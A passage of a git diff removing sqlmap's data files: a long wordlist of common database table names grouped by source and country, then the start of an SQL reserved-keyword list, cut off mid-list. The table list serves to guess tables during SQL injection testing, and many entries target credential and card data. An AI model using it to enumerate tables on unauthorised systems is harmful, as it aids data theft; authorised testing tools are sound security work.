-TimeDiff
-Titles
-ToPacmail1
-ToPacmail2
-Total Members
-UserPreferences
-uvw_Category
-uvw_Pref
-uvw_Preferences
-Venue
-venues
-VenuesNew
-X_3945
-stone list
-tblArtistCategory
-tblArtists
-tblConfigs
-tblLayouts
-tblLogBookAuthor
-tblLogBookEntry
-tblLogBookImages
-tblLogBookImport
-tblLogBookUser
-tblMails
-tblNewCategory
-tblNews
-tblOrders
-tblStoneCategory
-tblStones
-tblUser
-tblWishList
-VIEW1
-viewLogBookEntry
-viewStoneArtist
-vwListAllAvailable
-CC_info
-CC_username
-cms_user
-cms_users
-cms_admin
-cms_admins
-user_name
-jos_user
-table_user
-mail
-bulletin
-cc_info
-login_name
-admuserinfo
-userlistuser_list
-SiteLogin
-Site_Login
-UserAdmin
-Admins
-Login
-Logins
-
-# List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
-
-account
-accnts
-accnt
-user_id
-members
-usrs
-usr2
-accounts
-admin
-admins
-adminlogin
-auth
-authenticate
-authentication
-account
-access
-customers
-customer
-config
-conf
-cfg
-hash
-login
-logout
-loginout
-log
-member
-memberid
-password
-pass_hash
-pass
-passwd
-passw
-pword
-pwrd
-pwd
-store
-store1
-store2
-store3
-store4
-setting
-username
-name
-user
-user_name
-user_username
-uname
-user_uname
-usern
-user_usern
-un
-user_un
-usrnm
-user_usrnm
-usr
-usernm
-user_usernm
-user_nm
-user_password
-userpass
-user_pass
-user_pword
-user_passw
-user_pwrd
-user_pwd
-user_passwd
-
-# List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
-
-wsop
-Admin
-Config
-Settings
-tbl_admin
-tbl_admins
-tbl_member
-tbl_members
-tblservers
-id
-uid
-userid
-user_id
-auid
-adminpass
-LoginID
-FirstName
-LastName
-cms_member
-cms_members
-Webmaster
-Webuser
-tbl_tbadmin
-Adminlogin
-useraccount
-nguoidung
-quanly
-quantri
-dangnhap
-taikhoan
-taikhoanquantri
-useraccounts
-nguoidungs
-tbuser
-tblogin
-tbadmin
-tbaccount
-tbuseraccount
-tbnguoidung
-tbllogin
-tbladmin
-tblaccount
-tbluseraccount
-tblnguoidung
-tbusers
-tblogins
-tbadmins
-tbaccounts
-tbuseraccounts
-tbnguoidungs
-tbllogins
-tblaccounts
-tbluseraccounts
-tblnguoidungs
-tb_account
-tb_useraccount
-tb_nguoidung
-tbl_login
-tbl_account
-tbl_useraccount
-tbl_nguoidung
-tb_logins
-tb_accounts
-tb_useraccounts
-tb_nguoidungs
-tbl_logins
-tbl_accounts
-tbl_useraccounts
-tbl_nguoidungs
-tb_admins
-adminid
-admin_id
-adminuserid
-admin_userid
-AdminUID
-adminusername
-admin_username
-adminname
-admin_name
-usr
-usr_n
-usrname
-usr_name
-usrnam
-useradmin
-apwd
-adminpaw
-adminpwd
-admin_pwd
-admin_pass
-adminpassword
-admin_password
-admin_passwords
-usrpass
-usr_pass
-pass
-userpass
-user_pass
-dbaccount
-dbstudent
-dbstudents
-dbadmin
-useres
-dbuser
-dbusers
-personal
-dbpersoon
-list
-lists
-dblist
-userpassword
-user_password
-userpwd
-user_pwd
-SecurityLevel
-LastLoginDate
-LoginIP
-pword
-ad
-Konto
-Konten
-admin_psw
-verwalten
-verwaltet
-administrieren
-Verwaltung
-Administratoren
-adminpsw
-adminupass
-Kunst
-Artikel
-Autor
-Buch
-chat
-Kunden
-tblnews
-banner
-options
-general
-upload
-uploads
-file
-akhbar
-sb_host_admin
-Firma
-contenu
-Kontakt
-Kontakte
-Inhalt
-Kontrolle
-controle
-Kunde
-Tagebuch
-herunterladen
-dw
-glmm
-gly
-us
-stnuser
-stuser
-stusers
-stuseres
-dbstaff
-db_staff
-staff_db
-database
-databases
-test_user
-user_test
-test_users
-users_test
-Gruppe
-Gruppen
-guanli
-guanliyuan
-h_admin
-Bilder
-Mitgliederbereich
-key
-keywords
-Anmeldung
-Protokolle
-Mitglied
-Mitgliederliste
-Mitglieder
-mima
-mm
-mpassword
-musername
-Film
-Filme
-nc
-new
-Namen
-Auftrag
-Bestellungen
-Passwort
-power
-psw
-pswd
-pw
-pwd1
-jhu
-webapps
-ASP
-Microsoft
-sing
-singup
-singin
-registeration
-reg
-registriert
-root
-roots
-Tagung
-Sitzungen
-Einstellungen
-Standorte
-Statistiken
-sys
-Systemadministratoren
-systime
-Tisch
-Tabellen
-Titel
-u
-u_n
-u_name
-u_p
-u_pass
-Benutzer
-user_pw
-Benutzerliste
-userpasswd
-usr_pw
-usrs
-Benutzername
-Benutzernamen
-vip
-Webbenutzer
-sb_host_adminActiveDataFeed
-Kategorie
-Land
-Suchoptionen
-Serie
-Staaten
-UnterkKlasse
-Umfrage
-TotalMembers
-Veranstaltungsort
-Veranstaltungsorte
-Ansicht1
-utilisateur
-trier
-compte
-comptes
-administrer
-administrables
-administrateur
-administrateurs
-auteur
-livre
-entreprise
-concessionnaire
-concessionnaires
-telecharger
-groupe
-groupes
-liens
-connexion
-principal
-gestionnaire
-membre
-membres
-films
-nom
-noms
-ordre
-commandes
-partenaire
-partenaires
-passe
-asse
-enregistrs
-paramtres
-statistiques
-super
-tester
-utilisateurs
-intranet_users
-utlisateur
-Catogorie
-Pays
-Sujets
-Sondage
-Titres
-Lieux
-Affichage1Affichage1edu
-win
-pc
-windows
-mac
-edu
-bayviewpath
-bayview
-server
-slserver
-ColdFusion8
-ColdFusion
-Cold
-Fusion8
-Fusion
-ststaff
-sb_host_adminAffichage1
-Affichage1
-yhm
-yhmm
-Affichage1name
-sb_host_adminAffichage1name
-
-# site:jp
-
-TypesTab
-
-# site:it
-
-utenti
-categorie
-attivita
-comuni
-discipline
-Clienti
-gws_news
-SGA_XPLAN_TPL_V$SQL_PLAN
-emu_services
-nlconfig
-oil_bfsurvey_pro
-oil_users
-oil_menu_types
-oil_polls
-Accounts
-oil_core_log_searches
-SGA_XPLAN_TPL_V$SQL_PLAN_SALL
-oil_phocadownload_categories
-gws_page
-oil_bfsurveypro_choices
-oil_poll_data
-oil_poll_date
-argomento
-oil_modules
-ruolo
-oil_contact_details
-emu_profiles
-user_connection
-oil_poll_menu
-jos_jf_tableinfo
-oil_templates_menu
-oil_messages_cfg
-oil_biolmed_entity_types
-oil_phocagallery_votes
-oil_core_acl_aro
-regioni
-oil_modules_menu
-dati
-gws_admin
-oil_phocagallery_user_category
-articoli
-oil_content_frontpage
-cron_send
-oil_biolmed_measures
-comune
-SGA_XPLAN_TPL_DBA_TABLES
-esame
-oil_session
-oil_phocadownload_licenses
-oil_weblinks
-oil_messages
-oil_phocagallery_votes_statistics
-dcerpcbinds
-oil_jf_content
-SGA_XPLAN_TPL_DBA_CONS_COLUMNS
-SGA_XPLAN_TPL_DBA_IND_COLUMNS
-gruppi
-Articoli
-gws_banner
-gws_category
-soraldo_ele_tipo
-db_version
-SGA_XPLAN_TPL_DBA_TAB_COLS
-oil_biolmed_thesis
-jos_languages
-mlmail
-SGA_XPLAN_TPL_V$SQLTEXT_NL
-oil_bannertrack
-oil_core_log_items
-oil_rokversions
-oil_bfsurveypro_34
-oil_bfsurveypro_35
-oil_google_destinations
-gws_product
-oil_jf_tableinfo
-oil_phocadownload
-oil_biolmed_blocks
-oil_bfsurvey_pro_example
-oil_bfsurvey_pro_categories
-oil_bannerclient
-oil_core_acl_aro_sections
-SGA_XPLAN_TPL_V$SQL
-oil_biolmed_land
-connections
-not_sent_mails
-sga_xplan_test
-oil_languages
-utente
-documento
-gws_purchase
-oil_plugins
-oil_phocagallery
-oil_menu
-oil_biolmed_measures_by_entity_types
-offers
-anagrafica
-gws_text
-oil_groups
-oil_content_rating
-sent_mails
-oil_banner
-oil_google
-gws_jobs
-eventi
-mlattach
-oil_migration_backlinks
-oil_phocagallery_categories
-downloads
-mlgroup
-oil_sections
-decodifica_tabelle
-oil_phocagallery_img_votes
-oil_phocagallery_img_votes_statistics
-oil_dbcache
-oil_content
-p0fs
-oil_biolmed_entity
-oil_rokdownloads
-oil_core_acl_groups_aro_map
-gws_client
-decodifica_campi
-oil_phocagallery_comments
-oil_categories
-oil_newsfeeds
-oil_biolmed_measurements
-oil_phocadownload_user_stat
-oil_core_acl_aro_groups
-SGA_XPLAN_TPL_V$SQL_PLAN_STAT
-oil_core_acl_aro_map
-dcerpcrequests
-oil_phocadownload_sections
-oil_components
-discipline_utenti
-jos_jf_content
-oil_phocadownload_settings
-SGA_XPLAN_TPL_DBA_CONSTRAINTS
-oil_biolmed_technician
-oil_stats_agents
-SGA_XPLAN_TPL_DBA_INDEXES
-
-# site:fr
-
-Avion
-departement
-Compagnie
-produits
-spip_auteurs
-BDDJoueurs_alliance
-spip_articles
-spip_syndic
-pays
-spip_auteurs_rubriques
-spip_mots_forum
-spip_signatures
-diplomatie
-spip_mots_breves
-spip_forum
-spip_auteurs_messages
-spip_documents
-spip_messages
-spip_index_dico
-spip_meta
-spip_petitions
-spip_mots_syndic
-spip_types_documents
-etudiant
-spip_groupes_mots
-spip_documents_articles
-spip_rubriques
-spip_breves
-agenda
-BDDJoueurs_colonies
-spip_mots_articles
-spip_mots
-spip_syndic_articles
-spip_auteurs_articles
-spip_mots_rubriques
-BDDJoueurs
-modulephoto
-nuke_cities
-forums
-nuke_banner_positions
-nuke_subscriptions
-nuke_downloads_categories
-nuke_journal_comments
-nuke_bbranks
-spip_documents_rubriques
-nuke_confirm
-service
-nuke_bbthemes_name
-nuke_autonews
-nuke_bbdisallow
-nuke_reviews_add
-EDITEUR
-nuke_links_newlink
-nuke_faqcategories
-etudiants
-nuke_stats_year
-nuke_bbsmilies
-spip_mots_documents
-spip_documents_breves
-nuke_bbsearch_results
-post
-nuke_users_temp
-nuke_blocks
-nuke_reviews_main
-themes
-nuke_modules
-nuke_banner_plans
-nuke_links_votedata
-spip_referers
-inscription
-BONUS
-nuke_links_editorials
-nuke_topics
-nuke_bbprivmsgs_text
-chatbox
-nuke_referer
-nuke_bbauth_access
-nuke_journal_stats
-nuke_faqanswer
-nuke_banner_terms
-message
-nuke_bbvote_voters
-nuke_pages_categories
-spip_index
-modulerubriquephoto
-spip_visites
-Role
-nuke_public_messages
-actualites
-nuke_reviews_comments
-nuke_downloads_votedata
-nuke_headlines
-nuke_downloads_editorials
-enseignant
-modulemessage
-nuke_session
-nuke_queue
-nuke_main
-nuke_bbposts
-spip_ortho_cache
-Enseignant
-nuke_downloads_newdownload
-sons
-plurielanim
-nuke_bbforums
-nuke_bbsearch_wordmatch
-nuke_bbvote_results
-nuke_stats_date
-nuke_bbwords
-nuke_bbcategories
-typecompte
-nuke_stories
-nuke_stats_month
-personne
-etablissement
-nuke_counter
-indexation
-nuke_poll_desc
-nuke_links_links
-nuke_bbtopics
-Utilisateurs
-nuke_related
-nuke_downloads_downloads
-spip_versions_fragments
-nuke_bbgroups
-nuke_bbtopics_watch
-nuke_bbuser_group
-nuke_downloads_modrequest
-spip_versions
-Joueur
-nuke_bbsessions
-nuke_links_categories
-directeur
-Etudiant
-nuke_bbposts_text
-nuked_page
-Personne
-nuke_bbbanlist
-Parametre
-nuke_pollcomments
-nuke_bbforum_prune
-nuke_pages
-nuke_links_modrequest
-nuke_stats_hour
-nuke_groups_points
-nuke_reviews
-nuke_bbthemes
-modulemailling
-agence
-nuke_encyclopedia
-nuke_bbsearch_wordlist
-nuke_message
-Equipe
-nuke_comments
-nuke_poll_check
-nuke_journal
-nuke_stories_cat
-nuke_banner
-nuke_groups
-spip_visites_articles
-nuke_encyclopedia_text
-spip_referers_articles
-nuke_bbvote_desc
-Artiste
-nuke_poll_data
-nuke_bbprivmsgs
-spip_ortho_dico
-spip_caches
-
-# site:ru
-
-guestbook
-binn_forum_settings
-binn_forms_templ
-binn_catprops
-currency
-binn_imagelib
-binn_news
-phpshop_opros_categories
-binn_articles_messages
-binn_cache
-binn_bann_temps
-binn_forum_threads
-voting
-binn_update
-terms
-binn_site_users_rights
-binn_vote_options
-binn_texts
-binn_forum_temps
-binn_order_temps
-binn_basket
-binn_order
-binn_system_log
-binn_vote_results
-binn_articles
-phpshop_categories
-binn_maillist_temps
-binn_system_messages
-binn_articles_temps
-binn_search_temps
-banners
-binn_imagelib_templ
-binn_faq
-binn_bann
-phpshop_news
-binn_menu_templ
-binn_maillist_settings
-binn_docs_temps
-binn_bann_restricted
-phpshop_system
-binn_calendar_temps
-binn_forum_posts
-binn_cform_settings
-phpshop_baners
-phpshop_menu
-binn_forms_fields
-binn_cform_list
-binn_vote
-phpshop_links
-mapdata
-binn_submit_timeout
-binn_forum_themes_temps
-binn_order_elems
-binn_templates
-binn_cform
-binn_catalog_template
-binn_ct_templ_elems
-binn_template_elems
-binn_rubrikator_tlevel
-binn_settings
-binn_pages
-binn_users
-binn_categs
-binn_page_elems
-binn_site_users_temps
-binn_vote_temps
-binn_rubrikator_temps
-binn_faq_temps
-binn_sprav
-setup_
-binn_basket_templ
-binn_forum_maillist
-binn_news_temps
-phpshop_users
-binn_catlinks
-binn_sprav_temps
-binn_maillist_sent
-binn_forms_templ_elems
-jubjub_errors
-binn_maillist
-binn_catrights
-binn_docs
-binn_bann_pages
-binn_ct_templ
-binn_menu
-binn_user_rights
-binn_cform_textarea
-binn_catalog_fields
-vykachka
-binn_menu_tlevel
-phpshop_opros
-binn_form39
-binn_site_users
-binn_path_temps
-order_item
-
-# site:de
-
-tt_content
-kunde
-medien
-Mitarbeiter
-fe_users
-dwp_wetter
-dwp_popup
-voraussetzen
-dwp_foto_pictures
-dwp_karte_speisen
-dwp_news_kat
-dwp_structur
-dwp_foto_album
-dwp_karte_kat
-bestellung
-dwp_content
-be_users
-Vorlesungen
-dwp_content_pic
-dwp_link_entries
-dwp_ecard_album
-persons
-dwp_buchung_hotel
-dwp_link_kat
-dwp_news_absatz
-Assistenten
-Professoren
-Studenten
-dwp_ecard_pictures
-lieferant
-dwp_bewertung
-mitarbeiter
-gruppe
-dwp_news_head
-wp_post2cat
-phpbb_forum_prune
-crops
-mein_doc
-artikel_kategorie
-kategorien
-rel_person_paper
-tx_tcdirectmail_bounceaccount
-Akten
-skins
-riddles
-ci_slogans
-phpbb_vote_voters
-account_map_event
-roles
-stellen
-meetings
-special_category
-rel_paper_topic
-kbase_category
-attribut
-phpbb_auth_access
-zo_gruppe_stelle
-zo_kontakt_stelle
-hoeren
-shop_settings
-tutorial
-motd_coding
-artikel_variationsgruppen
-dwp_kontakt
-papers
-gesuche
-zahlung_weitere
-ts2_server_privileges
-artikel_variationen
-artikel_optionen
-chessgames
-portale
-products_images
-phpbb_privmsgs_text
-kurs
-KUNDE
-wp_linkcategories
-tx_tcdirectmail_targets
-tx_templavoila_datastructure
-Adresse
-bestellung_kunde
-rel_person_topic
-css_file
-visual
-account_multi
-Adressen
-phpbb_words
-phpbb_disallow
-kauf_artikel
-music_association
-phpbb_banlist
-dokumente
-greylist
-backup
-map_event
-kreditkarte
-house_extensions
-address_book
-crops_tpl
-phpbb_vote_desc
-versandkostenpreise
-pruefen
-gruppen
-vertreter
-phpbb_confirm
-verkaeufer
-be_groups
-rel_person_organization
-phpbb_privmsgs
-buecher
-kategorie
-phpbb_sessions
-phpbb_search_results
-studierende
-user_online_newyear
-hersteller
-object_link
-adresse
-address_format
-newsletter_recipients
-PERMISSIONS
-user_uploads_pictures
-festplatte
-veranstalter
-mein_doc_h
-tx_tcdirectmail_clicklinks
-phpbb_vote_results
-phpbb_topics_watch
-tx_tcdirectmail_lock
-account_map
-standort
-gd
-delete_reasons
-tx_tcdirectmail_sentlog
-valhalla
-vis_typen
-counter
-kbase_main
-music_items
-kauf
-payment_qenta
-seite_abschnitt
-trivia
-mehrwertsteuer
-massenmail
-klassen
-hilfe
-geraet
-tt_address
-dg_books
-portal_access
-orders_recalculate
-artikel_bestellung
-kontakt
-chesshistory
-notizen
-seite_layout
-virgator_table
-wp_categories
-chessmessages
-
-# site:br
-
-endereco
-pessoa
-usuarios
-estado
-pedidos
-CLIENTE
-itens
-telefone
-empresa
-PRODUTO
-categoria
-cidades
-clientes
-produtos
-municipio
-cliente
-LT_PROCEDIMENTO
-calendario
-D_US_FAVORITOS
-moradia
-pessoa_telefone
-contador
-aidf
-resumo
-add_irm
-M_ESQUEMA_PERMISSAO
-duvida
-LT_METODO_ATUALIZACAO
-M_RELATORIOS
-LT_SERIE
-estados
-LT_OBJETO
-cidade
-declaracaonf
-especieaidf
-S_SESSOES
-D_PR_HONORARIOS
-empresa_atividade
-correcaostrategy
-jos_docman_groups
-D_US_RECENTE
-notafiscal
-solicitacao
-pessoa_endereco
-atividade
-M_FATURAS
-D_PR_APENSOS
-agencia
-LT_LANCAMENTO
-D_US_AREA_DE_TRABALHO
-D_FA_ITENS
-dist_universidade
-multastrategy_faixamulta
-LT_TIPO_DE_ACAO
-D_PR_EVENTOS
-D_FA_PARCELAS
-tipodeducao
-D_PR_PARCELAMENTO
-sala
-D_US_EQUIPES_DO_USUARIO
-cidadao
-documentos
-S_GLOBAL
-M_CADASTRO_GERAL
-jos_docman_licenses
-guiaavulsa
-solicitacaosenha
-M_CUBOS
-promocoes
-grau_escolaridade
-imagens
-multastrategy
-D_PR_PARTES
-processo
-gestor
-imagem
-categorias
-LT_CLASSE_FORO
-jurosstrategy
-deducao
-S_PARAMETROS
-notafiscal_deducao
-CAIXA
-foto
-M_FERIADOS
-S_ORIGENS
-guiaavulsa_itemguiaavulsa
-situacaoitem
-notafiscal_itemnotafiscal
-cotacao
-papel
-M_EMAIL_FILA
-D_PR_OBJETOS
-dados_prefeitura
-S_LOG
-LT_FASE
-D_PR_ADVOGADOS
-M_USUARIO
-projeto
-LT_SITUACAO
-D_PR_CUSTAS
-grupoatividade
-LT_NATUREZA
-membros_familia
-instituicao
-emprestimos
-itemguiaavulsa
-D_EM_DESTINATARIO
-LT_GRUPO
-S_SEQUENCIAS
-itemnotafiscal
-disciplina
-jos_docman
-autorizacaonfe
-tipo_bolsa
-estoque
-LT_JURISDICAO
-serie
-sse_estudante
-LT_FOROS
-perfil
-despesa_familia
-noticias
-LT_GARANTIA
-M_ESQUEMA_HORARIO
-MM_NOTIFICACOES_DO_PROCESSO
-jos_jce_plugins
-grau_parentesco
-D_PR_GARANTIAS
-M_SERVICOS_PRESTADOS
-LT_CATEGORIA
-faixamulta
-encerramento
-M_PROCESSOS
-dados_familia
-MM_USUARIOS_DO_PROCESSO
-LT_ENCERRAMENTO
-LT_DECISAO
-indice
-contador_empresa
-sse_familia
-D_SE_INDICES
-cursos
-estado_civil
-dados_estudante
-LT_EQUIPES
-LT_PROGNOSTICO
-LT_EVENTO
-jos_jce_groups
-D_PR_DOCUMENTOS
-D_PR_DESDOBRAMENTOS
-logradouro
-despesa_aluno
-fiscal
-LT_CUSTOM4
-convite
-manutencao
-LT_CUSTOM1
-LT_CUSTOM2
-LT_CUSTOM3
-
-# site:es
-
-jos_respuestas
-DEPARTAMENTO
-EMPLEADO
-TRABAJA_EN
-DEPENDIENTE
-LOCALIZACIONES_DEPT
-PROYECTO
-lineas_fac
-pueblos
-NUEVOS
-CENTROS
-BANCOS
-PERSONAL
-SUCURSALES
-PRODUCTOS
-provincias
-jos_estadisticas
-USUARIO
-ALUM
-MOVIMIENTOS
-ACTOR
-nuke_gallery_rate_check
-ANTIGUOS
-CUENTAS
-vendedores
-CLIENTES
-articulos
-DEPARTAMENTOS
-PROFESORES
-jos_preguntas
-PEDIDOS
-EMPLEADOS
-nuke_gallery_pictures_newpicture
-Books
-grupo
-facturas
-aclaraciones
-preguntas
-personas
-estadisticas
-
-# site:cn
-
-url
-cdb_adminactions
-BlockInfo
-cdb_attachtypes
-cdb_attachments
-mymps_lifebox
-cdb_buddys
-mymps_payapi
-LastDate
-cdb_medals
-mymps_payrecord
-cdb_forumlinks
-cdb_adminnotes
-cdb_admingroups
-cdb_creditslog
-stkWeight
-mymps_checkanswer
-cdb_announcements
-cdb_bbcodes
-cdb_advertisements
-cdb_memberfields
-mymps_telephone
-cdb_forums
-cdb_forumfields
-cdb_favorites
-cdb_banned
-cdb_crons
-cdb_access
-cdb_invites
-sysmergeschemaarticles
-CodeRuleType
-cdb_membermagics
-cdb_imagetypes
-cdb_memberspaces
-cdb_campaigns
-pw_wordfb
-cdb_paymentlog
-cdb_adminsessions
-pw_adminset
-seen
-t_snap
-MSmerge_altsyncpartners
-zl_deeds
-pw_styles
-pw_announce
-cdb_pluginvars
-pw_smiles
-cdb_modworks
-ncat
-mymps_member_tpl
-pw_threads
-zl_admin
-cdb_onlinetime
-cdb_mythreads
-cdb_members
-spt_datatype_info
-mymps_certification
-mymps_badwords
-seentype
-mymps_cache
-zl_article
-spt_datatype_info_ext
-cdb_debateposts
-mymps_corp
-mymps_member_album
-mgbliuyan
-pw_schcache
-zl_finance
-pw_banuser
-mymps_news
-cdb_pluginhooks
-mymps_member_docutype
-wp1_categories
-cdb_magicmarket
-MSmerge_errorlineage
-cdb_activities
-zl_baoming
-cdb_orders
-ad_ad
-cdb_pms
-cdb_magics
-cdb_itempool
-phpcms_announce
-pw_actions
-pw_msg
-mymps_news_img
-cdb_debates
-cdb_magiclog
-pw_forums
-mymps_channel
-cdb_polls
-t_stat
-pw_attachs
-cdb_plugins
-pw_membercredit
-cdb_posts
-mymps_member_category
-cdb_activityapplies
-zl_media
-acctmanager
-pw_usergroups
-cdb_faqs
-cdb_onlinelist
-pw_hack
-mymps_member_comment
-Market
-mymps_config
-mymps_mail_template
-mymps_advertisement
-MSrepl_identity_range
-pw_favors
-mymps_crons
-pw_config
-pw_credits
-cdb_failedlogins
-mymps_member_docu
-pw_posts
-cdb_attachpaymentlog
-cdb_myposts
-cdb_polloptions
-wp1_comments
-cdb_caches
-pw_members
-mymps_upload
-spt_provider_types
-pw_sharelinks
-pw_tmsgs
-pw_polls
-cdb_moderators
-pw_bbsinfo
-aliasregex
-userfiles
-acctmanager2
-cdb_pmsearchindex
-mymps_news_focus
-cdb_forumrecommend
-publishers
-zl_advertisement
-guanggaotp
-pw_memberinfo
-aliastype
-mymps_mail_sendlist
-mymps_navurl
-
-# site:tr
-
-kullanici
-kullanicilar
-yonetici
-yoneticiler
-adres
-adresler
-yayincilar
-yayinci
-urun
-urunler
-kategori
-kategoriler
-ulke
-ulkeler
-siparis
-siparisler
-bayi
-bayiler
-stok
-reklam
-reklamlar
-site
-siteler
-sayfa
-sayfalar
-icerik
-icerikler
-yazi
-yazilar
-genel
-istatistik
-istatistikler
-duyuru
-duyurular
-haber
-haberler
-komisyon
-ucret
-ucretler
-bilgi
-basvuru
-basvurular
-kontak
-kontaklar
-kisi
-kisiler
-uye
-uyeler
-kayıt
-kayıtlar
-tel
-telefon
-telefonlar
-numaralar
-numara
-kart
-kartlar
-kredi
-krediler
-kredikartı
-fiyat
-fiyatlar
-odeme
-odemeler
-kategoriler
-tbl_Uye
-xml_kategoriler
-tbl_siparis
-tbl_googlemap
-tbl_ilce
-tbl_yardim
-tbl_Resim
-tbl_anket
-tbl_Rapor
-tbl_statsvisit
-tbl_ticket
-tbl_Cesit
-tbl_xml
-tbl_Cinsiyet
-xml_urunler_temp
-tbl_takvim
-tbl_altkategori
-tbl_mesaj
-tbl_Haber
-tbl_AdresTemp
-tbl_Firma
-tbl_Medya
-xml_urunlerbirim
-tbl_Yardim
-tbl_medya
-tbl_Video
-xml_markalar_transfer
-tbl_adrestemp
-tbl_online
-tbl_sehir
-tbl_resim
-tbl_Gorsel
-tbl_doviz
-tbl_gorsel
-tbl_kampanya
-tbl_Blog
-tbl_Banners
-tbl_koleksiyon
-tbl_Galeri
-tbl_Kampanya
-tbl_Favori
-tbl_sss
-tbl_Banner
-tbl_Faq
-xml_markalar_temp
-tbl_faq
-tbl_Personel
-tbl_Seo
-tbl_adres
-tbl_ayar
-tbl_metin
-tbl_AltKategori
-tbl_kategori
-tbl_Marka
-tbl_blogkategori
-tbl_ulke
-tbl_sepetold
-tbl_yorum
-tbl_Fiyat
-tbl_Reklam
-tbl_Kategori
-tbl_Yorum
-tbl_semt
-tbl_Tedarikci
-xml_kampanyakategori
-tbl_ozelgun
-tbl_uyexml
-tbl_rapor
-tbl_seo
-tbl_Indirim
-tbl_Ilce
-tbl_bulten
-tbl_video
-tbl_Ayar
-tbl_fatura
-tbl_cinsiyet
-tbl_reklam
-tbl_sliders
-tbl_KDV
-tbl_uye_img
-tbl_siparisid
-tbl_BlogKategori
-tbl_Yonetici
-tbl_kdv
-tbl_Online
-tbl_temsilci
-tbl_Dil
-tbl_banners
-tbl_Mesaj
-tbl_Logs
-tbl_logs
-tbl_fiyat
-tbl_SSS
-tbl_Puan
-tbl_kargo
-tbl_Statsvisit
-tbl_Koleksiyon
-tbl_dil
-tbl_Sepetold
-tbl_Fatura
-tbl_yonetici
-tbl_Yazilar
-tbl_Temsilci
-tbl_Kargo
-tbl_cesit
-tbl_uye
-tbl_haber
-tbl_SiparisID
-tbl_Adres
-tbl_Ozelgun
-tbl_banka
-tbl_Videogaleri
-tbl_galeri
-tbl_videogaleri
-xml_urunresimleri
-tbl_urun
-tbl_Ticket
-tbl_yazilar
-tbl_Ulke
-tbl_Urun
-tbl_renk
-tbl_Harita
-tbl_Sepet
-tbl_Sehir
-tbl_Uye_Img
-tbl_Semt
-tbl_indirim
-xml_kampanyakategori_transfer
-tbl_Takvim
-tbl_blog
-tbl_Sliders
-tbl_Renk
-tbl_UyeXML
-tbl_tedarikci
-tbl_Fotogaleri
-tbl_Doviz
-tbl_Anket
-tbl_Banka
-tbl_Metin
-tbl_XML
-tbl_firma
-tbl_harita
-tbl_banner
-tbl_sepet
-tbl_fotogaleri
-tbl_marka
-tbl_Siparis
-tbl_personel
-tbl_puan
-tbl_Bulten
-tbl_favori
-tbl_onlineusers
-
-
-
-# List provided by Pedrito Perez (0ark1ang3l@gmail.com)
-
-adminstbl
-admintbl
-affiliateUsers
-hsa_user
-tblmanager
-tblmanagers
-tblproduct
-tblproducts
-tuser
-tusers
-userstbl
-usertbl
-
-# WebGoat
-
-user_data
-
-# https://laurent22.github.io/so-injections/
-
-accounts
-admin
-baza_site
-benutzer
-category
-comments
-company
-credentials
-Customer
-customers
-data
-details
-dhruv_users
-dt_tb
-employees
-events
-forsale
-friends
-giorni
-images
-info
-items
-kontabankowe
-login
-logs
-markers
-members
-messages
-orders
-order_table
-photos
-player
-players
-points
-register
-reports
-rooms
-shells
-signup
-songs
-student
-students
-table
-table2
-tbl_images
-tblproduct
-testv2
-tickets
-topicinfo
-trabajo
-user
-user_auth
-userinfo
-user_info
-userregister
-users
-usuarios
-utenti
-wm_products
-wp_payout_history
-zamowienia
-
-# https://deliciousbrains.com/tour-wordpress-database/
-
-wp_blogmeta
-wp_blogs
-wp_blog_versions
-wp_commentmeta
-wp_comments
-wp_links
-wp_options
-wp_postmeta
-wp_posts
-wp_registration_log
-wp_signups
-wp_site
-wp_sitemeta
-wp_termmeta
-wp_term_relationships
-wp_terms
-wp_term_taxonomy
-wp_usermeta
-wp_users
-
-# https://docs.joomla.org/Tables
-
-assets
-bannerclient
-banner
-bannertrack
-categories
-components
-contact_details
-content_frontpage
-content_rating
-content
-core_acl_aro_groups
-core_acl_aro_map
-core_acl_aro_sections
-core_acl_aro
-core_acl_groups_aro_map
-core_log_items
-core_log_searches
-extensions
-groups
-languages
-menu
-menu_types
-messages_cfg
-messages
-migration_backlinks
-modules_menu
-modules
-newsfeeds
-plugins
-poll_data
-poll_date
-poll_menu
-polls
-redirect_links
-Schemas
-sections
-session
-stats_agents
-templates_menu
-template_styles
-update_categories
-update_sites_extensions
-update_sites
-updates
-usergroups
-user_profiles
-users
-user_usergroup_map
-viewlevels
-weblinks
-
-# site:nl
-
-gebruikers
-
-# site:cn
-
-yonghu
diff --git a/data/txt/keywords.txt b/data/txt/keywords.txt
deleted file mode 100644
index b280115150e..00000000000
--- a/data/txt/keywords.txt
+++ /dev/null
@@ -1,1635 +0,0 @@
-# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
-# See the file 'LICENSE' for copying permission
-
-# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)
-
-ABSOLUTE
-ACTION
-ADD
-ALL
-ALLOCATE
-ALTER
-AND
-ANY
-ARE
-AS
-ASC
-ASSERTION
-AT
-AUTHORIZATION
-AVG
-BEGIN
-BETWEEN
-BIT
-BIT_LENGTH
-BOTH
-BY
-CALL
-CASCADE
-CASCADED
-CASE
-CAST
-CATALOG
-CHAR
-CHAR_LENGTH
-CHARACTER
-CHARACTER_LENGTH
-CHECK
-CLOSE
-COALESCE
-COLLATE
-COLLATION
-COLUMN
-COMMIT
-CONDITION
-CONNECT
-CONNECTION
-CONSTRAINT
-CONSTRAINTS
-CONTAINS
-CONTINUE
-CONVERT
-CORRESPONDING
-COUNT
-CREATE
-CROSS
-CURRENT
-CURRENT_DATE
-CURRENT_PATH
-CURRENT_TIME
-CURRENT_TIMESTAMP
-CURRENT_USER
-CURSOR
-DATE
-DAY
-DEALLOCATE
-DEC
-DECIMAL
-DECLARE
-DEFAULT
-DEFERRABLE
-DEFERRED
-DELETE
-DESC
-DESCRIBE
-DESCRIPTOR
-DETERMINISTIC
-DIAGNOSTICS
-DISCONNECT
-DISTINCT
-DO
-DOMAIN
-DOUBLE
-DROP
-ELSE
-ELSEIF
-END
-ESCAPE
-EXCEPT
-EXCEPTION
-EXEC
-EXECUTE
-EXISTS
-EXIT
-EXTERNAL
-EXTRACT
-FALSE
-FETCH
-FIRST
-FLOAT
-FOR
-FOREIGN
-FOUND
-FROM
-FULL
-FUNCTION
-GET
-GLOBAL
-GO
-GOTO
-GRANT
-GROUP
-HANDLER
-HAVING
-HOUR
-IDENTITY
-IF
-IMMEDIATE
-IN
-INDICATOR
-INITIALLY
-INNER
-INOUT
-INPUT
-INSENSITIVE
